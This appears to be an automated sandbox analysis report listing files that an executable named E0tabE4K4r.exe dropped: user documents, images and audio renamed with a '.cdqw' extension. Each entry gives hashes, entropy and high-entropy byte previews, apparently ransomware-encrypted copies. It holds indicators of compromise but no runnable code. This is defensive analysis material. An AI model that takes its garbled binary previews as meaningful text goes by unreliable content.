                                                                                                                                                  Preview:SQSJK..m.#." .\..1....Z..l.........$.sAd;o.4....0LV...a.'g.-VU.iS.&~.........q..(..........2.:..{.[7M...s.....d.U.^.j?@.O........1..TWs..>u.....w.[..wc......kq..&.e~&.......s.c.....?.e.l..P.;7j...ciq.D..^...............I7..~.7......-g.i.....oX=.|..&..".z.=O.C.j..eH#C>..?p..D;.".c>}Z..e,...l.Y...^.-.O[...G&x.y(<..eK....;.".O..+.m..D...3N..I.....Zz...51M..RG;...8.!....I..=./.7..`..#E...ZY......>y2....M.gl{......l.2.j.....!!."...`.c..E. 6h.......H.3...%.8Z#.V...A..-...3....d.C..P..Y..u...u.T!.. %R1..OV\.ljfWlp.]U+...d....6`..a:..q...ye.....vW9q$.T~.OlR.x[...-.c..U.....H..H.e<.p.........K!z. .E..X..iD..G,.z....^.Pz&;b%.Kj.}..kO_....ZzB.K..ho.ne.'x.........g(.}.|.Q.O1.W.-<.(@..z.h..A. ..!..........w..3......x......~..;;....x..Ef&.{.G....F....^p.{fH<d.]0Bf.,.>..}.1[......N.].J.S..|4\p...CTR.i..a....Qm3~.6.=.Wu...Z_.....-7K.Z..')...L...![..0.f.F.V.L.x..UI.t..62I..$...E.]8....d&..~.h.<...F..b3..=I.....}l.:h..a'.w);.....|.. ....G..Y[8....I{x...........=.CCnv.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\TQDGENUHWP.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.858906327993815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:9bwLirDexXXcFS4UR5J9IbMytTjLQk2erVMgfgIXVEFHN03dWh1aiGythdQ/+o2X:0irDexXXT4g2ljLQmrVR/lEFHgAopyxR
                                                                                                                                                  MD5:1FFBBE8ADA6B1B2E17A7AACD6CCF34AF
                                                                                                                                                  SHA1:73BDEAA6C223FF6CFA2F791AF8784BF88EEB9E81
                                                                                                                                                  SHA-256:E424548C5DCD83C5D06A77926876D7BD4CA761CDF6843B3C8A6CCD73E880BD01
                                                                                                                                                  SHA-512:FB9280CDA6CAF2C604C00A9106EA81A62320E821BDA250CF9A6F942061AF357F7B987E7E7EB0B3C80E74157C5CB6DAF37E9C2E2289D59625BC173A9D2895390A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.vWjF.zD..m.z .u.O...q......D.I......g'.....G..sO...d"........;S.L.U.)R6?{.,6d2.0.,J.U.[. 6...R.:...1.U..Dr9.{.Sv...4...6.Y...........N.J.....53...$.V....pc.......L/..g|~.b=.{ ....dv..qz9uAIG.{..^...m.^.0.|...R..g..c...0...Q..).?SK3y..fB1...''y..-.7.&.l....o .2..../#..[..jC)n7nx........X9z.....]Q...)T.LZk.....L..1.w.X.;.......F.....*.da_;.RUB?U..C.O....!S..I.<....s.vZ.p..;4,g.F\@....yya.t...<.<0J.1......h....Xi.I....Yj!b\........4.5{.T..p.a.X..z..a..i.?_z.9...KV...z..@.c.Y...n.8.....4..X...B..m.`.[...{h.(<+|...,.z........A.u.uP.Rh.......^...]....C#O....7....7....k.....r...8..4f...Q%..%.._.Q.t.....g.`.:......Ln.....k..'4..q^...oa.F...m.....n .m.C@ea.......:..%.k.bC..)._...D.'.'I.v...9..5..k.x...0KX=.vO6.o'u.D..?l/,.27....M....O.F.....V.K0j..Y^.T..}m|M.;...ZL.`..=..IZ[OhH...s.......d. 3...E..%..Va=...{d....}#U...m......r...f..~2...*...+..f.'>j.+.B...K/0..a..R{..[..b.7..eJov[............V.c....r...F..L...3"......?..

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\TQDGENUHWP.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.846955282966085
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:DoDICleqT1OVeZ4otw7j33NPWrwHeXlGSD8zaOJcFDOxQhAGq/WRPFy88hnPWM2X:DoMCIqToK4dXHNPWeeXlGy8HaN6X1zhi
                                                                                                                                                  MD5:AB7E2DA9231B2AE4F629F2A65C8CC21A
                                                                                                                                                  SHA1:F4585D10A9EAAE7506198B71A4957FE0E042E6D4
                                                                                                                                                  SHA-256:9DA8EE5E5D868E4CABA77BD4949F8A5D8AE4CADE1ECDD98B076CFF4EC571810D
                                                                                                                                                  SHA-512:E25733986A620179567D38677F07D4AFA3119E66939356D37CFE5F685BC08011229E412AFAC7A7A0EFBB6CCD84A0F3201D803413010D8FE1621AF529E4F21ED7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.V.=....|......r P.h})....9...v-.........-].|.YU. .6.=..?...\P|.....4#".......p?s..c..~d....8M....e...:..&...../.%...Z..j':....3..c.l>...h..\Y....^.t.a..,..j.F..t..pOmc......&z.B^..Q.~~'.P.].<~S..)...L...A..g..k0.....T...x...2`....*..2X?w......"....?..yzg.CT=.<.9.u<8C^..[t.........F...dnk....U....8.....!.[}_.zN.9..3.s!(-..D.G.(Ij....H...0+l?Y.........r'....$@.@u.S...j]'#&..3.7.p.i.-...e.TW.....^..*......R..D9B.yTA%....../|..WD...A>..i.#.w.F>j.>Z._..n5.&y..9K..^......,.:..H.....N...i.`".G.z5?.4{Y.N0M..$..M..R.jJloF..U..(A...;v.+....p./..h..p.G.d.e%..s........f...39`e..Iw/........%..".k..a.I.Oy\.b..E.8....YoF....)...l.h.*.n9../..)..k..P<H........Sv..Z.r\...w...17...X"EFe....p........1Y.A......p...,......=.\.._..kE..!....l.w2..q.jwN.!..Q.....)U...T...8R..d..,../x.dL..-!#.[8b.kLK.D.Ab~.U......<...=...p......<e...B).[...9.d..N+..|.o.+4..8.m.62...V..kd'.e....Q.......!ixGE.i...0;.N...#.S.Ef....{.......IZ=6D...V...(...ts...td..3#1...h.Fl..

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\TQDGENUHWP.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.86575407683932
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:3adIyXHypRUHkOCWChDDUWTKKg1xIjdu4JPwNiDEzx6dGC/FcEciZL04Gt0geGTQ:qd/6RUHkzWChDD5Hvdr2iDEzwGcFcULx
                                                                                                                                                  MD5:AC1A1D68DBB467B46F6814CC1348D3CF
                                                                                                                                                  SHA1:1BEA5D45741D15FEB148A3C19F8A340798B1401A
                                                                                                                                                  SHA-256:FCD373E66531C205E78D5631A1AAA9A583005FD67A7B17F1C35AE825BB2F1EDE
                                                                                                                                                  SHA-512:4AC323F39EBEBE5DB76AC5647C24BAE5164B3D254324C07E7799DB3701561660B2AA37A37B61FFDA9BA1124B68EAC89A787CEC625B4254F49A25B6C476D93F87
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE..]c22.T#....x...0.U..l,^o{.p....:...Gx.>G.....eS..a.V.uI.N.`.%1...]*...89.sd_.P........g.<...&....<.7..%..W.H$..r32.J^..4.7.Q.=V...?.V.3.....r.b...1.N+>.....5.v._\`....v..#..`..J3.C.s...".?.....p....y.D.k3..>..5.#.U..W.Z..t.F.....4.....gq..,N..eo.l.S.cb...+.?..../...1.._B.........|W.6..1.~.&.E.{.m...H..{..~..x..Jf6$.R..)U....(.../t..z.....|.&E2.G.+.....V...jjw.0p.d..c.V...L.9...Z.5.2..t.m._.p.[.... .#K.....O.]......F...RZ....~.d6....B...q..l...)..........\.qDn .T....Y.\...x6C@1..xD.dp.B2..:..*..-..G..IM.....9...O$^.H....i9....K....s...e....o.Yv/P.M.s.aY...$}.._f..D|hx.5...k6:2....f.X?g..m).V.B...\.P.-,g.....cw. .:I....JPI..5.Y.C3.y..$~....../..`.zK.....x..N.|...,9.............;.}......H..IL.I...6I....}I.Ub..Q.*....r..B.b.%..cjiJE......VB[{*P.I.=...f5P..T.\.5d.....G....\.8...m5.."}.=Al..C\...d^`t.j...:....^.-...zG..9.Mww.n.R3...b$..;^....R>..].f._.."{...kd.v...Gu.........G.T....,.M....c&Js} U.....y|.`..s.[....._..4........=7.=.SQ.IX..U.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\TTCBKWZYOC.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8556269693781005
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Bf0aNlNG1JP6pG49FeXPUtb/muMqqaci3Ps8e33vA+xFyty30J7AHEB2bD:BfDzo1J7QFWPeHMJac+PQHvAR7AHPD
                                                                                                                                                  MD5:BE30A70AA1FC45C9D1D5A348F92AB97E
                                                                                                                                                  SHA1:47BE8731B378350D6904D62FD713AA7195F9B3C5
                                                                                                                                                  SHA-256:5CBE65B15D373AA646DABE708D6D2C51374F848C7610CA5E682C8E9CCCB9EA5D
                                                                                                                                                  SHA-512:530A48A4375C418D79F66D6AC950F63A6248FD8806B6264941D2334AF105E555C572621D567EA68A61950E1EB9694D4038F283A516598C53BC6A20C4C5294243
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK....7......Oq.UfI.[....Od._...y.=./^...b...U.5.~z.&...?..-p..f...Y......d...Q\..?%...}.k..A@.:..s.........@.....p..N.....NG..wx....N.+`.bR...I.T......iEH_A}...K.:...]....k<g\....%.U....9..^f....3S..sb.*.!..J...A.=......A....\*$.;..:>].qh...b.&..+!8...i...........Q..........5dk..z.G1]..x..J8A....P4.{..t(b.f.Ca.......d.....g.j..(.. ..s.(~..j..zo...~.t.r.n.~.@./.L..U.C...s.N..v..oP.y.j....hsm.Q.C......Hn.s.prX.O*Qx.`.'.NS-;S{.O.[....=.l;.....U...q8.[.N.i.....Z^}v.`.Ww...t...[.....u..UEO...=-...8e".hu.p.x.1O...FBA..f..."+..p....".....>)i.y.r[..5........,Q.......kzKe.}....$%..q<.wX....l.cK......t?.[.Y:...(..,....m|...?.wM..[,f.p5'_..jY.n.S.cb.{X.N..S...~U].....r..0.g....e.b.d.p..6|F.RmO..!A..T..O....n^I..z..dq0...K.....T.wh..........&..Dtn..K..")..............80UY.....#..!.]?h[..DBR&X.J.....D,.NE..W}N...A..Gh.5.%..1l..X.']......]..\......K.....-.n.l.O`x...4.r..^m....#...:.$.2...\SlbG..@....5.D;sJ.,..N..H...gR.I.q..A'H.n..";.3...,/f.....2`.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\TTCBKWZYOC.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.858248537485456
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PURIEfGA9lITgkcYNxQq2CarIabHs4NQTk3ApmHpTfO0r3W11qLeDTPLqX42bD:PUffhIENY4q4EabLCTkw8p6pvPTzUD
                                                                                                                                                  MD5:64B4F20639BBF54ADBF405FD74F6FDCD
                                                                                                                                                  SHA1:DE8C15A400C268E0A986CB77B969D2AB7DEB934E
                                                                                                                                                  SHA-256:0BB66DD41DB97EA8403ABB8689CD0889AB7D42A19B361A726D84C118AC9EB9D0
                                                                                                                                                  SHA-512:006C742521CE3EE5114BE2B7399288CF2CB958932044DD362A923EA847FB82D7FEA1D3DA7075037A184B3D5DC290E6B6DF8501642AF1464AA63BAAE3CB34BAA9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK..$.vJ2\..W.w...:..\.b6..I.s.......6.:K.T.Exs..M...1.d.= .u#.?b?..w#..6J.[q....Q.G.!.s.-.Nh\I.:6...T.g..Z<..qS...[R61..Z.*AT.......1..8..I....-.&...l.>.F?...&-..w..9.... /.....X...<fm...z.....[...&.7g"Q...._..d".H..+.......PamL..j.?.....0..E...LJ.v.hm....U.`ay%.n).1......F..FX.H...5..'.....s.T4..mA.,./......c.9..R..F...D..]B..{t..]..z.X)n.=E8Ey..";...9ym........gw....~..F...".....LVmg.hs&...)#..1..M...u..*....B'.#..........`........t.._.&.d.'...h..F..r.X....<k=.+...+.....&..v..9....Cd}....P..;.P...l4.6vbI6. +.+.......U4....H.u......5....%.mk.=l./..}.+.A+8..a.u4cU..#.B/..a.L^.KSw..g.U...N..]...d.y..0.>....N4.k........Eco..j...<?.........;....];....rl....|...I0.Z..W.t.Rw!...?.Se...v...1.X. ..(\...^.....Kv..m.)Ar....8.~.#e.;..")..?X....pgu.L^`.........&.C+Z.....cSAv..........-.....'...C...jg...fB0.@..7h..ff$..B....B."...j_d...Y..n.>e....H.g..M=d.lP..<.fy.3.T.h.......Dw$|".]..SGV.X.]._.[.k.......o./....'..R...-....=.6t..n%$.\;......Ji,....

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\TTCBKWZYOC.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.850071554194392
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:65JonIGoIVb46fEa9EQrk6096mS9DQBSvNihE1HTmWCd1eRe972bD:6DoJoI5tEcrk609SrFVyFk2oD
                                                                                                                                                  MD5:52C749824A757F348E4130D13B26A26E
                                                                                                                                                  SHA1:29794ADE1BC0D1D4A9C5186AFC9FEDA35C53006E
                                                                                                                                                  SHA-256:F55B61CD53821A12AECC1BCACC7E7471255AC7AA2127A4C14A4A7B928CB99D59
                                                                                                                                                  SHA-512:C06D81A5F758CFF0CF1582CA4EE35EFCD96D71C67E43B6919D970454248C3424F318EDB1E3CB6DEA66BBEFDE7EA16099729529D6A874A5C0E5CF4EC088B4B424
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBKA........'d.)._.t\.~z....xh. 2.$.S..h.J8NI........y...<Y..Rj:v.....N..h.[..wb.*.9...W.+Q........Z.`.6[_..D..7.Q!..5/^...5..f......|.j....H.T.x!.l..z..&`.<.[.y.L...{...Z.}1.c(X.].......=...b.?..`.i.......#..8....TLKC.t.*l....S,.R.K.A.a*.n.B..7L.(....@..G...^`k..........BqZ.P/...v..B ..X...s.}..y.h.[^I..I.c.)32H....I...G..@...mU..q-IP'O.......N.=.....&#.M.......C..s...4U...a.-.A..}i.Wk.<..s..Ei.ir.8qA.5..c:...../+A...b#6..l.t..s.....P)w......M.....{2...ilH..@....?.~H^..1K.W...~P.1&v.].K..1..+..M...&.L..JnO.z.[..b."...dOR...g....NBq..v.z.....f].2t6..h..^..W.G......cJ....|z:a.m..{.........-.D. w../....._g...q.H........"......4..}...^[.D....6.....FW..lg.3.!5.&..K..;.|.q..4=..]$...E.'.#b.d.UX.a.bk....."..GN...c)AK..s..U.uV.i...`..o..Q...WR..@.6M...|2.2n..&.L.`.k.V?..kmE.M}A..J.0QR...W|V,d&yI...J.....V..d.....\......</.....T..R.%.h.Db.g1.:...,QM.8.pP.....a.......'.l....@j.m.'...E..OO..).Ot`..q|.8qt=@.b..Y.&....-..!....ikIs.,......R.n...J..../.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UMMBDNEQBN.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854810315367942
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:aTnYTOFMnurZ0a/VUHlBAtwbf3mHdodMTYSC55rz/XiFgfq9Pmlyh2bD:aTnYyFMuLYAtSvydo+TYFpz/yFgfoT6D
                                                                                                                                                  MD5:4B39496F8627432243960B8933A5820C
                                                                                                                                                  SHA1:97D3CCFE0923A2A75112ED1B38CA366E2AE10FDC
                                                                                                                                                  SHA-256:FB02A73AA68F85AB1852ABC0A3BA248AA61BEE603B162119D36EB8882CEE65E3
                                                                                                                                                  SHA-512:9E162A9A8A0B37D782A5BF734B17D687762099E8A5A5E14975431EC6F7BB2DF0DC3A6DD989BEDB67D79FF074594C4D4FDF7A35D5CB29E82F6EB2ADFB4E0679B2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UMMBDz.9).I..9-.&..j"TN{...n...*...]/.Y4..\F._......{.)..0.3.P..H..5K(.J..Uhn.kC.WG.=ZJ,de\.D.Q4.Ys}d.9F.o.Qj.2.!..V..u.20...4....-..a..|#j.P..%...e...:.Zt.i......>Ec.^.&.1..A2.$.C.........!.H.Lx%(t....j=.m3`.......6C...C....`.]....i..`b...C.BF....Z.n.%..6<.'.'..4.4..2..].............'..T.../q-^Q..H.4im^...4.....M.;Ax......S....S.c.....f..6.....koZva!.D5...0......Yl"...,0.......%."..C.'..4..vP...8.`.0......-...jc.........O..dm...K\...vR.A..27.q...K..,..a..{.px.....1.]..!m.1..q#........k..Mt..#.. s8....@'.k<..)R.......Bb...P.M)@........|...)z....W..(..&..w$.F.hTdvi..|..........R.SZ.o...._.`.(.Hr|a..-..2k3l.. 5.|.......|...z..]^.P>.#."b1...&...{.G..\.].+..O.1."ND..H.Q.,.Ji[c...........g....P\r..CM.......g.|.u.o..Z.7?..H91C..B.d` -.P^.. .m.U,fDV/...A|...&..1.C.Z.S..i..Q..*..y..m..?.\....m....I*..Q.P....;...F.`..e<EPN...=..g.q0E.....3....*x...S..r......fc'.....E6.h.DS.....[,}A.v...>.QY..[.u....+H3jD...[(...y.5.._4NB.7jW.T.0;..]..2}z

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UQMPCTZARJ.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.850304552200516
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:aS8Jl02e5/sjUf6t95amsmoQmkqtJ2z9r5LnesCNd1lcTmQnj7fwUV2bD:aS814gUfOVsmitQr5isK38mQnjL7uD
                                                                                                                                                  MD5:2351ED498FBCBD5260BDC47B56863D8C
                                                                                                                                                  SHA1:F3935DB49202A524E5FC3E0310C26D0CFA6492AD
                                                                                                                                                  SHA-256:E6AE2BB7ECE9F173B426DE83BF199F30AB9DF218E6F079F6CDEAA2E1A35A1DF4
                                                                                                                                                  SHA-512:3AA4C9B01A08E6CC730FD412F9850D4DB17BF9ECEB063840A2B10F77A10A89E49A9FF715F09001A06D31F5BA3461C4864F323F1E22D419E4B9E9AB7A1B8DB5EC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UQMPC..].....(...y..{.B..>.z.T..MG..J...+.S..M....<-...)..+.hN?Q....u.Q..........]+Vb.d..&.;.1HY=...d..(..d.jnf:.:`oD.G....D...A.+..%o'4e.A>.:..........4........:.Qr..B.........;A\iz.8.Q...$..C..Q.S.X..S..od\.....x}....,...26.......bR........I.`...C/Fo..).2!Gah>.0.1~.....z[.$......o`..GY$.fK.J...w...g.....CGq'QL.h.3.2...H.+....4....._....G....q]Ckd...b..L.>h>D"S.(aa.S.f.G.-..}...2;d.`.O.._K.s..^........X=....z...h..ht..I..XX%..^1.S.....[....\|USt.l.`t+.l=......?+...1.....Z4..lvG.]..z...r....\...Yl.B.LO........B..47.V...5o...+.Uny..j.p....+?..:0.@Q.%..;.Q...{...b..0 ..{@..U.........|...5.......^..<X@J.jR...f.....~Y3.l....t%H.[.-...0&.3:.,h.O~7|.(.9l.J....Y.V.e..7R/.5..b%/"g.N...G.n...W...;.}S.m.G..j........5..]..hI...#..8..S..u...s.Q3.....-.6...W.ln`b..1.1...O.O.[N<...;u...v.M..f7...X'....^.b......ei..... 4.W1v;3.n.B.......RVb.X..a..y..~a.F*?..d.....8...|......e..D.....U.s.aX..G...=.M.[F.......rC.....b....s+..NW.|..=L......#...8.

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\VQCDRUFMUU.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.870417240427034
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wh6yTZ+Z1vwD+W7VhUulpN/W9sUV/ZOXLdQPp9VanQKHIO7Z89uo2bD:wtgWJqGjWCUhZaRy9VanTZ8yD
                                                                                                                                                  MD5:00DD538E6D3AAB6274B613F4C21BB8CE
                                                                                                                                                  SHA1:5844C46F184B24E482E6ACDA3B06193ADF5ADF85
                                                                                                                                                  SHA-256:EBD51DD2569C2644669F9C37B45917B55CBED2A284F453821141B1E3389F3DB9
                                                                                                                                                  SHA-512:B0569ED0056DC454187673484A74C8EA37F544AC73D47A56334FF0A0719C9B6F6B5E885A52B08C52323E12D2155711F681DB18EC7A516DB5EC81D2D7D33A7581
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:VQCDR.> ....{7}o...c..@3j.?f.{....ef..,Jg.^..rH....T.<4./.5W.i.\.G%&....+$....6/-w:.A{..j?U......kw].Z.j...........A...TE@.4..5....z$..O....c.l9....A.Lk..H.f.E.>z../.[.D.ZW..h."y.-...{.#j...UY'.........I..km....y...("...k..Zw..b]I..+.$v.&.X]Dv.u..#.f.1.zXj2./.E....+....!(.D......J2p..Y.m..)..5RJ......De..'...u...-..;....P.ZP.......Z.......Q,.>2.G/."xl...f..t.h$I....4.rV4....\G.(..PU....t.....V.F..Y.d..|w.....{._...w$6UJ.F..W_.Q\...N5Q..".I.0.Cx..*..9....{......I...e.}......7.O..<............gM.........sM.....j..N*......V.I..,.".<M.~.X..*E..,....K.g.~=..].1.B...h1T.o5....$..D.."..q.N..._}_k....R......i...;E......f.i.Dd.3-...h.m..h}...8..b..C.d..W..P.`.|......G..N...j.i..,.c.V..l&....=.X*KH/...\{<8.v...hi..y.!.....#d..gD....Me~I".._......p<..[..a.....;.t...S.....O.C..!#B...' ....$H..8.....z..U.$z...t...$...x..T.u*h....@g.....N.G...Q...q~.{.dm?6.G......!._3S...($.:.V].X.....J....)./*c8.l.sV1:..w...M.....H.. ...4.......M*.n.(.s..F.PuX\t..`...0

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\VWDFPKGDUF.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.838785167712684
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1BEb2WUP927fyVpFiLY1zxRwu2Q7+Zn7SUyS2lNnu/CUREu6F4JftOnzBoV2bD:nVP90y8LUxRn7+IlXNnu/CU56GJftGoW
                                                                                                                                                  MD5:8EFF5F7016900F6856A3F21017B4CFBB
                                                                                                                                                  SHA1:56ECE6E0811E573FFEA2893C7544B84D9C43E24D
                                                                                                                                                  SHA-256:433E0379BC2FB40F37C6950973E51CE48CF56348CC2B1239DD5BA449E4BBEB04
                                                                                                                                                  SHA-512:C0BA015365682E7E921E1E805908DC0B79C7885B758A0C24868CCD560FB1C142CFF30ADC8DB6655C3A20DB79D699E4839850D004A65CD8B957E8D399D342B36D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:VWDFP].x..b.......4..h..q.......$Ip8.....}.Mkn.-3jA.1......a*....U...].%...,.6.J._.........k..Wwx2..x...f~.{3.....cZj..,.C.\U./.=.."..P.S...I..lq..;&.....7..*.5.C..FWl.d.EG}b..1....))8...:..<~o..L..7...C=aS.i.zq1.)...GUB.Z.t...`......Z[..T\....8.0..*....q.....X..\*..c_.....m..?Z...>.....Z..G.O.....x..Q...&.sO..R..3.1B..>....Gs...y9,.y,...B.z....Rk/.,.2U..P......,.*`7....)*.|.$5.....{:c}.......Ff.]!...,.......1...@u....~&..[K..;C.`=u.y_.V....G....8.UphR7)./...Q..{).".v.S:......1..nneu.f.z...,.5.F0...:M..&.o....\.j... .a...\B.ja..(BI....S..*.|....Z.1_..@"..V....o....:...t.B.$...e..8....'+..@. ..N...Z......z...)....y.............erT...1....e...M$..LX.V$i.Q...[..g...}..g.h.{K.S....A...t...Z@@O_..w.?nH.V..T7..........7M.. K...)..,u$P....c.D..O.2q.+...6..}......b...S...~.4.K.X.`.!.N..MXn.&.........ZX.E0|..*..TL/?{R..Z..z..6.{.nL.s.:`.tWy...L.J.-.....9..Pg\.[..y.._F..V...S9..F.T.)......./.Yd.#........M:.`.B.2...^.....@....E......V..i.>..

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\WKXEWIOTXI.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.860203365135462
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:kFbUZMFL5jGG4cPR8GWCeT6PZVYJm7J+WJp0WDd0FMrpWcY2bD:kFwQtjgC++P4q/P0cAGD
                                                                                                                                                  MD5:590DE91C2A6E732B0988752D567441DC
                                                                                                                                                  SHA1:01AF62A1CDA4F5614635747C1AA52FFDE4DE2551
                                                                                                                                                  SHA-256:04CBDC80A0C7398D3601007F8085F000D70EC41BB5C4757FBDB7168603C022D0
                                                                                                                                                  SHA-512:C8C58E4236DC834BAABFE8B119804F1030021BD6556B33A66399A3B7584F294CD81E0C636CAD06944541F11D2A18AF13FFCF25DF4839FBFA0C4E6E90542DDEC4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:WKXEWK../..L..G.....u.......AN.8U..N%.O....lg...b...u.F....?..%..(....6.Q.7.5....~r.X@>.u.....\..Qq.*D.........f4...\..f..I$g.B.yU.04..7.P.f.S..s...t9]d..s...U.#.&.....U..X.D....A.....W4W.H7.@4..C.{]7.M..o.3]a!.'Ei.,.z.(Sca..w.-ZR.K...,])..`Z.P.MZ..|.b.UYXs /.1.._H...r....8.xn..2=...lx.HP..`...:T......b...Si.a...(.`....N.3F.~.U...M.f{....;.:.k.~Z].........T1.Q`..(+.ne..Bwupe-W.,7.........3*.....A.%...BtL|.?..]....mG ..m..a.....e-.N.W........d..-.C.5.L/.z.Q.....l..y..l.*.C<.s....4.L{. =..S.e............<.D6C:..!s..'....P.......1.4?(}..bj....9...q.........x.f. .'YO.Jf.....@..!.Ewm....<;.fFH.%.,.B..}.....y.-!<;..tK.O...{..T.g.....*..*...C..n....8fs..2.K7B6...............[dD.E..V......R7P...e.!.*.xn...S;.M.`._=.h....+..*.....,.^.m....R.G.0S.*...|.j.[@.]..&p......q.{G..nb..d...........O..bQ... ..\....C#[.C.$....j.|qJ....sA...c....}...";O.....L.V.5..eW.FZS~...:.[..mb.IB....)...k`....V,.9|..Z..02.g..4.......TyrS.y...H.9.T.....c.6.......N...

                                                                                                                                                  C:\Users\user\Application Data\Microsoft\Windows\Recent\WKXEWIOTXI.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.837656588032206
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:g6IQQy5tMrm32+brVQRTEsvzCAx1i4wdsjTyp5aa30qv1fdClr2cKpdtgA2bD:uH6lVbriqs7F1cdsjTyp5aa3TvdJcKrI
                                                                                                                                                  MD5:07BC7E0B93A068D12746E88FD815FE8E
                                                                                                                                                  SHA1:13A02CB8260501CB243D80B487E64F2F7F90CD1A
                                                                                                                                                  SHA-256:9AB373DF5915250F1AADBAED050159384C04F96566F19F8135426050D5697093
                                                                                                                                                  SHA-512:02BE33C9C9E0B6236CB923B69DC105A73C6C9E7018BD05B62AF085DC14CFF303403CF491C766A476EDDA0C2EC4C3784D83CB160328CFB1BADC0B9BC7A36D9AA8
                                                                                                                                                  Malicious:false
